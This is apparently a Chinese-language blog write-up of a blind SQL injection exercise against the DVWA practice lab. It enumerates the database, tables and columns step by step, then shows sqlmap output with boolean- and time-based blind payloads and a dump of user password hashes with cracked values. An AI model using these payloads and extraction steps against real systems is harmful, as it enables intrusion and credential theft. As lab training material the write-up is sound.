1.判断注入点
通过and 1=1判断注入点是否存在
2.猜解数据库名长度
3.猜解数据库名
通过ASCII对照表第一个字符为d
第二个字符为v
第三个字符为w
第四个字符为a
数据库名为dvwa
4.猜解数据库中表的数量
可以看出数据库中有两个表
5.猜解第一张表的长度
第一张表名长度为9
6.猜解第一张表的表名
第一个字符为g
第二个字符为u
一次猜解出第一张表的数据库名为guestbook
7.猜解第二章表的长度
通过猜解,获得表名长度为5
8.猜解第二章表的表名
第一个字符u
第二个字符s
依次进行猜解得出表名为:users
9.猜解users表的字段数量
通过猜解可以获得字段数为8
10.猜解第users表的字段名
①第一个字段名
第一个字符为u
第二个字符为s
第三个字符为e
第四个字符为r
第五个字符为 _
第六个字符为i
第七个字符为d
第八个字符不存在,追钟第一个字段名为user_id
②第二个字段名
第一个字符为f
第二个字符i
第三个字符r
第四个字符s
第五个字符t
第六个字符_
第七个字符n
第八个字符a
第九个字符m
第十个字符e
第十一给字符不存在,最终第二个字段名为first_name
③第三个字段
第一个字符为l
第二个字符为a
重复上述操作最终可以得出8个列名分别为:
User、avatar、failed_login、first_name、last_login、last_name、password、user_id
11.通过sqlmap注入获得user字段和password字段的值
sqlmap identified the following injection point(s) with a total of 98 HTTP(s) requests:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3304=3304&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.62-log'
database management system users [1]:
[*] 'dvwa'@'127.0.0.1'
available databases [3]:
[*] dvwa
[*] information_schema
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3304=3304&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3304=3304&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3304=3304&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user | password |
+---------+---------------------------------------------+
| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+
Limit:
Limit子句是用来限制select查找结果的显示行数
Limit x,y
x:x代表起始位置,从0开始
y:y代表返回行数
substr(str,pos,len)
str:需要被截取的字符串
pos:从第几个截取,起始值为1
len:每次截取字符的长度
2716
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
